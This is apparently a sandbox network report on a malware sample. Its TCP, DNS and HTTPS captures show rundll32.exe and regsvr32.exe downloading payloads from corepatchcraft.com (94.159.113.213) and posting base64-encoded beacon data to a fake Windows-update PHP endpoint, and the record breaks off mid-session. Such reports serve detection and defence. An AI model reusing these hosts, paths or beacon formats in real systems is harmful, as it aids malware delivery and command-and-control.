                        Jan 16, 2025 06:04:02.524056911 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:02.524234056 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:02.558197975 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:02.558231115 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:02.911032915 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:02.911202908 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:02.911695957 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:02.911725044 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:02.911956072 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:02.911969900 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.286196947 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.286539078 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.290923119 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.290951967 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.291296959 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.293042898 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.295118093 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.335418940 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.367753983 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.367906094 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.367944002 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.368019104 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.370491028 CET64473443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.370513916 CET4436447394.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.510941029 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.511013985 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.511126041 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.512187004 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.512221098 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.721369028 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.721419096 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.721457958 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.721532106 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.721570015 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.721646070 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.815649986 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.815679073 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.815907955 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.815973997 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.816050053 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.895937920 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.895976067 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.896241903 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:03.896261930 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:03.896331072 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.019124985 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.019166946 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.019251108 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.019275904 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.019424915 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.019424915 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.021157980 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.021178961 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.021253109 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.021270037 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.021326065 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.116480112 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.116508007 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.116626978 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.116645098 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.116700888 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.147516012 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.147546053 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.147608042 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.147624016 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.147663116 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.147684097 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.148489952 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.148515940 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.148581982 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.148596048 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.148648024 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.148669958 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.209088087 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.209129095 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.209331989 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.209355116 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.209451914 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.243877888 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.243899107 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.244024038 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.244040966 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.244127035 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.274369955 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.274394035 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.274518967 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.274585009 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.274656057 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.275450945 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.275476933 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.275531054 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.275547028 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.275578976 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.275599003 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.335954905 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.335988998 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.336167097 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.336183071 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.336299896 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.336388111 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.336416006 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.336502075 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.336515903 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.336566925 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.347948074 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.348213911 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.348767996 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.348798037 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.349019051 CET64475443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.349031925 CET4436447594.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.371274948 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.371335983 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.371390104 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.371404886 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.371452093 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.371476889 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.400624037 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.400657892 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.400727987 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.400747061 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.400782108 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.400805950 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.401127100 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.401159048 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.401338100 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.401351929 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.401432991 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.463844061 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.463866949 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.464073896 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.464088917 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.464184046 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.464660883 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.464679956 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.464735985 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.464749098 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.464775085 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.464817047 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.465610981 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.465631962 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.465687990 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.465701103 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.465727091 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.465744972 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.466555119 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.466586113 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.466676950 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.466690063 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.466763020 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.467044115 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.467072010 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.467118025 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.467130899 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.467159033 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.467175961 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.498393059 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.498414040 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.498543978 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.498610020 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.498696089 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.498850107 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.498869896 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.498982906 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.498997927 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.499053955 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.528091908 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.528110981 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.528271914 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.528337002 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.528430939 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.550426960 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.550446987 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.550559044 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.550576925 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.550651073 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.590344906 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.590367079 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.590508938 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.590524912 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.590595007 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.591125965 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591146946 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591202974 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.591219902 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591257095 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.591257095 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.591655970 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591675043 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591737032 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.591752052 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.591816902 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.592263937 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592283010 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592344046 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.592360020 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592386007 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.592410088 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.592868090 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592889071 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592932940 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.592946053 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.592974901 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.593004942 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.595763922 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.595782995 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.595863104 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.595876932 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.595952988 CET64474443192.168.2.694.159.113.213
                        Jan 16, 2025 06:04:04.614989042 CET4436447494.159.113.213192.168.2.6
                        Jan 16, 2025 06:04:04.615016937 CET4436447494.159.113.213192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 16, 2025 06:01:58.374888897 CET | 57025 | 53 | 192.168.2.6 | 1.1.1.1
Jan 16, 2025 06:01:59.237261057 CET | 53 | 57025 | 1.1.1.1 | 192.168.2.6
Jan 16, 2025 06:02:15.643115997 CET | 53 | 49369 | 1.1.1.1 | 192.168.2.6
Jan 16, 2025 06:02:30.142590046 CET | 53 | 59796 | 162.159.36.2 | 192.168.2.6
Jan 16, 2025 06:02:30.630842924 CET | 51376 | 53 | 192.168.2.6 | 1.1.1.1
Jan 16, 2025 06:02:30.638219118 CET | 53 | 51376 | 1.1.1.1 | 192.168.2.6
Jan 16, 2025 06:03:01.654944897 CET | 58089 | 53 | 192.168.2.6 | 1.1.1.1
Jan 16, 2025 06:03:02.537010908 CET | 53 | 58089 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 16, 2025 06:01:58.374888897 CET | 192.168.2.6 | 1.1.1.1 | 0x18ee | Standard query (0) | corepatchcraft.com | A (IP address) | IN (0x0001) | false
Jan 16, 2025 06:02:30.630842924 CET | 192.168.2.6 | 1.1.1.1 | 0x27a8 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 16, 2025 06:03:01.654944897 CET | 192.168.2.6 | 1.1.1.1 | 0xcb03 | Standard query (0) | corepatchcraft.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 16, 2025 06:01:59.237261057 CET | 1.1.1.1 | 192.168.2.6 | 0x18ee | No error (0) | corepatchcraft.com |  | 94.159.113.213 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 06:02:30.638219118 CET | 1.1.1.1 | 192.168.2.6 | 0x27a8 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 16, 2025 06:03:02.537010908 CET | 1.1.1.1 | 192.168.2.6 | 0xcb03 | No error (0) | corepatchcraft.com |  | 94.159.113.213 | A (IP address) | IN (0x0001) | false
                        • corepatchcraft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-16 05:02:00 UTC | 81 | OUT | GET /kernel2.aspx HTTP/1.1
Host: corepatchcraft.com
Cache-Control: no-cache
2025-01-16 05:02:00 UTC | 252 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 05:02:00 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
ETag: "d0d40-62b59bbb4c5fe"
Accept-Ranges: bytes
Content-Length: 855360
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49709 | 94.159.113.213 | 443 | 6932 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-16 05:02:00 UTC | 81 | OUT | GET /libraries_v2 HTTP/1.1
Host: corepatchcraft.com
Cache-Control: no-cache
2025-01-16 05:02:00 UTC | 252 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 05:02:00 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 Jan 2025 13:52:00 GMT
ETag: "44a00-62b5a661817dc"
Accept-Ranges: bytes
Content-Length: 281088
Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.6 | 49712 | 94.159.113.213 | 443 | 6932 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:02 UTC | 81 | OUT | GET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:02 UTC | 252 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:02 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.6 | 49713 | 94.159.113.213 | 443 | 6744 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:03 UTC | 81 | OUT | GET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:03 UTC | 252 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.6 | 49714 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:03 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 585
                        Cache-Control: no-cache
                        2025-01-16 05:02:03 UTC585OUTData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6b 4a 32 59 57 46 46 54 6a 6b 72 52 7a 6b 76 62 31 5a 5a 55 31 67 72 64 7a 30 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6b 63 35 65 54 5a 49 4c 7a 6c 47 55 46 41 76 51 69 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6c 6b 31 61 6d 35 69 4e 6d 64 49 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6b 52 6c 56 30 35 47 5a 44 6c 73 52 33 4d 76 4f 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6d 45 31 63 6e 5a 69 4e 6d 39 44 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 4a 68 63 45 78 32 59 6e 63 39 50 53 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 59 6d 63 39 50 53
                        Data Ascii: data=eyJBbldGaCI6IkJ2YWFFTjkrRzkvb1ZZU1grdz09IiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsIkhkVlFwQSI6Ikc5eTZILzlGUFAvQiIsIlFGWnlpaVVYWSI6Ilk1am5iNmdIIiwiUmJvdCI6IkRlV05GZDlsR3MvOSIsIlNiWlduWCI6ImE1cnZiNm9DIiwiWWtKVyI6WyJhcEx2Ync9PSJdLCJjZktYIjoiYmc9PS
                        2025-01-16 05:02:04 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:04 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.6 | 49716 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:05 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:05 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:05 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:05 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.6 | 49722 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:06 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
